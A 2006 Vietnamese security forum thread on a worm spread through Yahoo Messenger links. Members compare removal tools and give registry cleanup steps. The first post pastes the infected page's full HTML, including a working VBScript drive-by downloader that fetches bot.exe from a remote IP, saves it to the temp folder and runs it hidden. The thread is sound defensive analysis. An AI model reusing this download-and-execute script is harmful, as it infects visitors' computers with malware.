Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 00:26:56 (+0700) \| #1 \| 20872

sptit_145
Member

Joined: 16/08/2003 02:07:00
Messages: 13
Offline

sáng nay nhận được mấy cái này lận, chẳng biết là cái gì nữa, ae xem dùm tôi với
<noframes>
</html>
<head>
</head>
<body>
</body>
</noframes>
<html>
<head>
<title>::: Welcome to wWw.VuiVeVn.Hp.Ms :::</title>
</head>



<div id="PaypopupStartCode" style="display:none">
</div>
<script language="JavaScript1.1">
if (typeof(paypopupScriptStart) == 'undefined') {var paypopupScriptStart = false;}
if (!paypopupScriptStart) {
document.write('<scr'+'ipt src="http://popunder.adsrevenue.net/popup.php?'+(new Date()).getTime()+'&id=ncuongnet&pop=enter&t=5&subid=45841&blk=1&fc=0"></scr'+'ipt>');
paypopupScriptStart = true;
}
</script>
<noscript>
<div style="width: 1px; height: 1px;overflow: hidden;"><a href="http://www.paypopup.com">Online Advertising</a></div>
</noscript>



<body leftmargin=0 topmargin=0 scroll=no>
<script language="VBScript">
on error resume next
dl = "http://72.22.71.37/~camptong/bot.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<script type="text/javascript" language="JavaScript" //
SRC="http://counter1.supercounter.org/cn2.php4?img=358&id=28882"> //
</script>
<br>


<STYLE>
.ae_table_horiz { width:auto; height:auto; background-color:None; }
.ae_td_horiz, .ae_image_td_horiz { padding-bottom: 4px; padding-top: 4px; padding-left: 3px; padding-right: 3px; vertical-align:top; }
.ae_image_td_vert, .ae_image_td_horiz { text-align:right; padding-top:4px; padding-bottom:4px; padding-right: 4px; }
.ae_image_td_sky { text-align:left; padding-top:4px; padding-bottom:0px; padding-right: 0px; }
.ae_bb_td_horiz { padding-bottom: 4px; padding-top: 4px; padding-left: 3px; padding-right: 3px; vertical-align:top; }
A.ae_title_horiz, A.ae_image_link_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: bold; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; }
.ae_desc_horiz {font-family: Verdana,Sans-Serif; font-size: 11px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: #FF0066; }
.ae_click_count_horiz {font-family: Verdana,Sans-Serif; font-size: 10px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: None; }
A.ae_powered_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: normal; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; }
A.ae_yourlink_horiz {font-family: Verdana,Sans-Serif; font-size: 9px; font-style: normal; font-weight: bold; font-variant: normal; text-transform: none; color: #CC0000; text-decoration: Underline; }
A.ae_title_horiz:hover, A.ae_powered_horiz:hover, A.ae_yourlink_horiz:hover, A.ae_image_link_horiz:hover { color: blue; text-decoration: Underline;}
.ae_image_horiz { border-width:1px; border-color:#CC0000;}
</STYLE>
<SCRIPT LANGUAGE="JavaScript">
adengage_num_ads = 6;
adengage_layout_type = "horiz";
adengage_show_your_ad_here = 1;
adengage_yourlink_text = "See your link here";
adengage_show_powered_by = 0;
adengage_show_click_count = 0;
adengage_class_suffix = adengage_layout_type;
adengage_arrow_text = "";
window.adengage_draw_break = 1;
window.adengage_use_image = 0;
window.adengage_image_size = 0;
window.adengage_hide_desc = 0;
</SCRIPT><SCRIPT SRC="http://adcode.adengage.com/js/ae_9725_adbox.js" LANGUAGE="JavaScript"></SCRIPT>



<script language="javascript" type="text/javascript" src="http://vnadsense.com/bannercode/vnadsense.php?id1=bc10b5d35606596a378ebad5dae1c152&id=42b531854e1a49b4c83e478ca5658f99"></script>


</body>
</html>

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 00:45:56 (+0700) \| #2 \| 20875

ducnamnv
Member

Joined: 22/09/2003 15:29:11
Messages: 55
Location: Đâu đó
Offline

Tôi thấy cái file bot.exe này đích thực là làm bằng AutoIt v3 rồi, lại mang cái hình ảnh icon giả dạng thế thì chắc chắn là VR rồi, đề nghi các cáo thủ Luke, light.phoenix, Jamesmr...... tham gia cho anh em được học hỏi với

Fan of LeVuHoang, conmale

[Question] Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 00:53:08 (+0700) \| #3 \| 20876

RyuuSontay
Member

Joined: 26/06/2006 19:41:23
Messages: 15
Location: Hà Nội, Việt Nam
Offline

Uh, mình sáng nay ngu ngơ thế nào cũng click vào cái link này từ một người bạn gửi cho, tưởng có gì hay ho nào ngờ nó thay đổi home page, không cho khởi động lại máy, tự động gửi luôn link này cho tất cả mọi người có trong list của messenger, quảng cáo linh tinh......he he he, bực quá, máy lại đang trục trặc, tức mình Ghost lại luôn.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 01:42:20 (+0700) \| #4 \| 20886

havythoai
HVA Friend

Joined: 05/04/2004 22:59:39
Messages: 562
Offline

Đây là những link dẫn tới con Virus đó

- hxxp://nhut.be
- hxxp://fun.nguoiiu.com
- hxxp://rev-club.info
- hxxp://VuiVeVN.HP.MS

hxxp=http <~~ tò mò, nên bị dính

nó sẽ chiếm luôn trang chủ IE

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 02:11:18 (+0700) \| #5 \| 20895

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

ai fix dùm cái smilie

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 02:23:13 (+0700) \| #6 \| 20897

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

địa chỉ lây lan virus đổi tên thôi nhưng cũng là con ban đầu,các pác vào đây tải về để fix:
http://nguyensi.nhan.googlepages.com/killnhutbe.zip
chạy xong nhớ enter mới hoàn thành.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 03:33:53 (+0700) \| #7 \| 20912

microware
Member

Joined: 05/09/2006 16:24:05
Messages: 1
Offline

thằng bạn nghịch ngợm làm máy em cũng bị dính. Nó khoá cả regedit và task manager mới đau chứ. Em xoá file .exe của nó rồi mà vẫn ko vào được regedit và task manager . Ai giúp với.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 03:51:50 (+0700) \| #8 \| 20914

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

microware wrote:

thằng bạn nghịch ngợm làm máy em cũng bị dính. Nó khoá cả regedit và task manager mới đau chứ. Em xoá file .exe của nó rồi mà vẫn ko vào được regedit và task manager . Ai giúp với.

các pác chạy tool của tôi ở trên thì sẽ giải quyết được tất cả các vấn đề do con này gây ra.
tool của tôi sẽ làm như sau smilie

lại phải giải thích lại 1 lần nữa.. :cry: )
enable registry,enable task manager,enable hompage,delete những key do virus này tạo ra.

[Question] Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 04:52:58 (+0700) \| #9 \| 20933

lamnguyen23t
Member

Joined: 29/06/2006 18:55:03
Messages: 6
Offline

anh ơi!xem lại cái tool anh cho dùm em với!đã mở đc task manager, chạy cái tool của anh thì bitdefenden nó vậy nè!với lại có thêm cái gì trên desktop đó!noop quá kô biết

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 05:28:21 (+0700) \| #10 \| 20945

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

tôi xin khẳng định là tool này 100% là do tôi code vì thế không có chuyện có trojan gì ở đây.các pác mod ở đây có thể kiểm tra.còn về phần bitdefender thì không phải cái nào nó báo cũng chính xác đâu bạn ạh.

với lại có thêm cái gì trên desktop đó!noop quá kô biết

bạn nói có cái gì trên desktop ?tôi không hiểu bạn có thể nói rõ hơn.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	06/09/2006 05:54:17 (+0700) \| #11 \| 20962

sptit_145
Member

Joined: 16/08/2003 02:07:00
Messages: 13
Offline

Chán thật, có một trò cũ mà cứ phá hoài, kô biết thang nào vậy, lợi dụng để phá, với lại thằng này cũng lợi dụng để tng quảng cáo thu lợi bất chính cho nó.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	07/09/2006 13:24:17 (+0700) \| #12 \| 21349

dqt
Member

Joined: 06/09/2006 00:27:53
Messages: 8
Offline

hxxp://VuiVeVN.HP.MS

===> Mình đã dùng chương trình killnhutbe.exe của bạn ko thể diệt được con này rồi (mình đã bấm Enter rồi) mà sau đấy lại có 1 con virus cũ xuất hiện tiếp mới điên chứ . Con này là www.maybaygiay.tk và 1 con nữa là www.sanvuichoi.com . Bác nào biết cách giải quyết chỉ cho em với !

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	07/09/2006 21:23:20 (+0700) \| #13 \| 21385

lamnguyen23t
Member

Joined: 29/06/2006 18:55:03
Messages: 6
Offline

bác bị dính con này khác con YHfunny đấy

[Question] Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	07/09/2006 23:57:11 (+0700) \| #14 \| 21435

RyuuSontay
Member

Joined: 26/06/2006 19:41:23
Messages: 15
Location: Hà Nội, Việt Nam
Offline

Các bác thử dùng Bkav894 của anh Quảng xem thế nào.

http://www.vnexpress.net/Vietnam/Vi-tinh/Hacker-Virus/2006/09/3B9EDE15/

Link từ nguồn vnexpress.net

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	08/09/2006 11:24:05 (+0700) \| #15 \| 21645

dqt
Member

Joined: 06/09/2006 00:27:53
Messages: 8
Offline

Dùng Bkav 894 của anh Quảng mà vẫn ko diệt nổi mới sợ chứ . Hiếm khi gặp con virus nội nào khiếp thế . Thậm chí mình đang trả lời bài này nó cũng tự hiện ra đây này : http://sanvuichoi.com
===> Trời ơi , dai như đỉa . Bác nào biết nó đăng ký khoản tự động hiện ra này chỉ cho em giải cách quyết nóng với ........... hic

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	08/09/2006 13:28:48 (+0700) \| #16 \| 21687

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Chiều nay gặp vuive.hp.ms gì đó, ngồi chơi với registry bị khoá 1 hồi, cũng giết nó được luôn. hình như icesword gì đó có cho phép ghi lên registry , chỉ delete không cho ghi mới. Làm một hồi cũng bỏ được cái homepage của vuive.hp.ms. BKAV cho cái file .vbs để giết, nhưng chắc gì nó làm được, acc administrator bị khoá luôn chức năng regedit. Mò bằng soft icesword thử bà con, hay cái spybot , tui chỉ biết sài soft, lập trình là gì tui đâu có biết.
BKAV giết được tạm, ko tắt đươc cái file tự giả dạng task management của con virus đó. Thành ra khởi động lại là bị lại luôn. chỉnh registry, đồng thời xoá cái file tự chạy. Con virus đi ngủ với dế. Tui còn dốt, ai chỉ thêm đi.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	09/09/2006 05:40:47 (+0700) \| #17 \| 21895

e2307pro
Member

Joined: 08/09/2006 17:59:16
Messages: 20
Offline

hic. loạn rồi thế này thi chết rồi

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	09/09/2006 12:34:12 (+0700) \| #18 \| 21988

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

báo cáo:

MÁY TUI KHÔNG BỊ DÍNH MÀ TƯỜNG THUẬT LẠI MÁY KHÁC

máy em tui bị tui gửi cho cái file của james chạy và đã enter nhưng không diệt được

Down tiếp cái của bác quảng mới nhất chạy 30 phút cũng thua.

Restart lại vẫn bị

Chả biết tools bác james và quảng thế nào mà làm ăn chả được

máy đang chạy xp sp2 nhé

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	09/09/2006 12:50:02 (+0700) \| #19 \| 21989

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

channhua wrote:

báo cáo:

MÁY TUI KHÔNG BỊ DÍNH MÀ TƯỜNG THUẬT LẠI MÁY KHÁC

máy em tui bị tui gửi cho cái file của james chạy và đã enter nhưng không diệt được

Down tiếp cái của bác quảng mới nhất chạy 30 phút cũng thua.

Restart lại vẫn bị

Chả biết tools bác james và quảng thế nào mà làm ăn chả được

máy đang chạy xp sp2 nhé

hình như đang xuất hiện biến thể mới tên này đã code lại thì phải(sao "bọn" này rãnh nhĩ :? smilie

,tôi chưa có mẫu "con" u nói,ai có mẫu "con" này ko(file exe)?

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	09/09/2006 12:54:32 (+0700) \| #20 \| 21990

roboconvn
Member

Joined: 09/09/2006 01:52:13
Messages: 1
Offline

HKCU là HKEY_LOCAL_CURRENT_USER)

- Vào Regedit và tìm khoá

HKCU\Software\Microsoft\Windows\CurrentVersion\Run \IEXPLORE.EXE
HKCU\Software\Microsoft\Internet Explorer\Main\First Home Page
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page

Xoá hết giá trị nào là hxxp://www.vuivevn.hp.ms

- Xoá HKCU\Software\Yahoo\Pager\View\YMSGR_Launchcast\content có URL là http://vuivevn.hp.ms

- Xoá

HKCU\Software\Yahoo\Pager\View\YMSGR_Calendar\content
HKCU\Software\Yahoo\Pager\View\YMSGR_Games\content
HKCU\Software\Yahoo\Pager\View\YMSGR_Weather\conte nt
HKCU\Software\Yahoo\Pager\View\YMSGR_buzz\content
HKCU\Software\Yahoo\Pager\View\YMSGR_Yahoo360\cont ent

có URL là hxxp://vuivevn.hp.ms

- Gõ địa chỉ các trang web nên gõ đầy đủ. Ví dụ gõ http://www.namsao.com.vn là được.

- Con virus này có 1 đặc điểm mới là tạo ra 1 biểu tượng Internet Explorer trên màn hình desktop biểu tượng này link trực tiếp trang wed vn-n.com làm cho người sử dụng rất dễ nhầm lẫn ,bạn có thể loại bỏ biểu tượng này 1 cách đơn giản nhất là bạn xoá tất cả các biểu tượng Internet Explorer trên màn hình Desktop . Sau đó thì tạo shortcut lại cuối cùng bạn vào trong IE đặt lại trang chủ .
Bạn có thể Download chương trình chống spyware và rootkit của Microsoft tại đây Antispyware

Có thể bạn không truy cập được vào regedit.

Hãy download tệp sau về và chạy nó thì bạn sẽ truy cập được vào regedit.
Bấm vào đây để download http://namsao.homeftp.net/911/download/khoa_regedit.vbs.

Nếu bạn không thay đổi được trang chủ của Internet Explorer hãy chọn

Start -> Run -> gõ gpedit.msc -> User Configuaration - > Administrative Templates -> Windows Components -> Internet Explorer.

Sau đó nhắp đúp chuột chọn mục bên phải có tên là: Disable changing home page settings
Rồi chọn thuộc tính là Disable.

Sau đó bạn đặt lại trang chủ là và chạy bình thường.

Nếu không vào được phần Run trong menu Start:

- Bạn có thể vào mục Start->Programs->Accessories->Command Prompt.
- Hoặc download đoạn mã sau về và chạy nó http://www.namsao.com.vn/download/run.reg
bai viết này các bạn có thể áp dụng đối với nhiều trang tương tự

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	09/09/2006 12:59:38 (+0700) \| #21 \| 21991

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

dqt wrote:

===> www.maybaygiay.tk và 1 con nữa là www.sanvuichoi.com .

tool của tôi chỉ chuyên trị nhut.be,daokhuc.be,wWw.VuiVeVn.Hp.Ms .Tôi không biết thông tin gì về mấy con xuất phát từ hai trang trên.

[Question] Re: Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	10/09/2006 06:47:21 (+0700) \| #22 \| 22129

fantome1721
Member

Joined: 21/05/2005 05:49:29
Messages: 1
Offline

Em cung da tung click vao nhu.be, em cung nghe nhac trong do luon ma van khong bi gi. Hom sau moi nghe ban be noi la virus, em dung chi mcfee thoi. Nay nghe may anh noi thay ghe wa.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	10/09/2006 21:58:03 (+0700) \| #23 \| 22220

badbigboy1
Elite Member

Joined: 12/03/2003 16:59:34
Messages: 48
Offline

hoa ra cái thăng cu qtl lại chơi con này với sanvuichoi, hê may quá không bị rơi vào guồng máy đó smilie

Không mất 10T như chới, bố mẹ ở quê lấy đâu ra xiền smilie

)

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	10/09/2006 22:51:27 (+0700) \| #24 \| 22235

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

tool của tôi chỉ chuyên trị nhut.be,daokhuc.be...tôi không biết thông tin gì về mấy con xuất phát từ hai trang này.

vậy mà tôpic bên kia bác james bảo chúng nó cùng 1 loại, cứ lấy về sài,nên tui lấy về sài smilie

BÁc viết lại fix thằng sânvuichoi đi

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	11/09/2006 03:23:16 (+0700) \| #25 \| 22312

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

channhua wrote:

tool của tôi chỉ chuyên trị nhut.be,daokhuc.be...tôi không biết thông tin gì về mấy con xuất phát từ hai trang này.

vậy mà tôpic bên kia bác james bảo chúng nó cùng 1 loại, cứ lấy về sài,nên tui lấy về sài

BÁc viết lại fix thằng sânvuichoi đi

mới đầu tôi kiểm tra trong trang wWw.VuiVeVn.Hp.Ms thì thấy là cùng loại còn mấy trang sau này thì tôi chưa có mẫu của nó.hình như tên viết "con" này code lại rồi đưa lên trang khác hay là những tên khác lấy source về rồi code lại nói chung sao bọn này rãnh quá smilie

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	11/09/2006 23:27:39 (+0700) \| #26 \| 22532

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

cái này tui đã kiểm tra kĩ trong registry và trong các file của yahoo không có cái nào có vuivevn mà nó vẫn bị dính cái chiêu set status và send msg cho group khi mới log in vào . pó tay thiệt,

mặc dù không bị khoá homepage, registry, msconfig, taskmanager nhưng xoá nó không được

các cách đã dùng không thành công:

james tools, bkav newest tools, remove infect regis key in all regis hklc,hkcu..., search file in hdd, bực mình dùng tiếp spyware doctor, norton av nhưng vẫn dính . hic hic thằng này khó chịu thiệt

bác nào fix cái

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	12/09/2006 02:18:27 (+0700) \| #27 \| 22576

jamesmr
Member

Joined: 03/03/2006 06:30:26
Messages: 153
Offline

channhua wrote:

cái này tui đã kiểm tra kĩ trong registry và trong các file của yahoo không có cái nào có vuivevn mà nó vẫn bị dính cái chiêu set status và send msg cho group khi mới log in vào . pó tay thiệt,

mặc dù không bị khoá homepage, registry, msconfig, taskmanager nhưng xoá nó không được

các cách đã dùng không thành công:

james tools, bkav newest tools, remove infect regis key in all regis hklc,hkcu..., search file in hdd, bực mình dùng tiếp spyware doctor, norton av nhưng vẫn dính . hic hic thằng này khó chịu thiệt

bác nào fix cái

không biết ở Việt Nam mình có ai chơi rootkit được chưa?vì nếu mà VR nó tích hợp rookit thì việc kiểm tra thông thường không thể phát hiện được.
Tuy nhiên u vào đây kiểm tra thì sẽ phát hiện cái message status của nó ,rồi xoá nó đi khởi động máy lại xem còn không:
HKEY_CURRENT_USER\Software\Yahoo\pager\profiles\[tên nick yahoo của mình]\Custom Msgs
(không có dấu ngoặc [] khi gõ nick vào).
CHÚC THÀNH CÔNG.

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	13/09/2006 11:13:40 (+0700) \| #28 \| 22939

dqt
Member

Joined: 06/09/2006 00:27:53
Messages: 8
Offline

Vấn đề là bạn phải diệt Virus chứ ko dùng cái cách này lần sau vào nó lại hiện ra tiếp , dù đã xoá rồi . Phải dùng trình nào diệt con này trước đã rồi giải quyết hậu quả sau ...............

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	13/09/2006 22:22:29 (+0700) \| #29 \| 23034

chupichu
Elite Member

Joined: 16/07/2004 14:17:57
Messages: 229
Location: Lầu Xanh
Offline

Cái này trước mình bị dính rồi, từ con bạn thân nó gửi, tưởng nó gửi cái gì ai ngờ click vào cái thì vù vù vù, thử dùng cách này để diệt.
1. Thoát hết các trình duyệt internet
2. Start/Run tìm :
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f hoặc Download cái này về http://windowsxp.mvps.org/reg/EnableTM.reg . bước này là để Enable Task Manager
3. Bấm Ctrl+Alt+Delete ,chuyển qua tag Processes chuột phải end process tắt hết mấy cái bl4ck.com
4. Vào search tìm kiếm các File có tên bl4ck và prefe rồi delete nó đi .
5. Bấm start - Run , chạy đoạn lệnh này :
(REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f ) Cái này là để Enable cái RegEdit
6. Reset hết history, websetting

Where Have You Gone..

[Question] Sao dạo này nhiều ngừoi lợi dụng YM phá hoài vậy	18/09/2006 06:30:20 (+0700) \| #30 \| 24052

channhua
Elite Member

Joined: 18/07/2003 04:49:28
Messages: 338
Offline

search được file bl4ck xoá , del luôn rùi, mấy cái kia enable hết rùi mà vẫn dính

làm hết rồi mà nó vẫn còn dính hay thiệt

Go to:

Users currently in here
1 Anonymous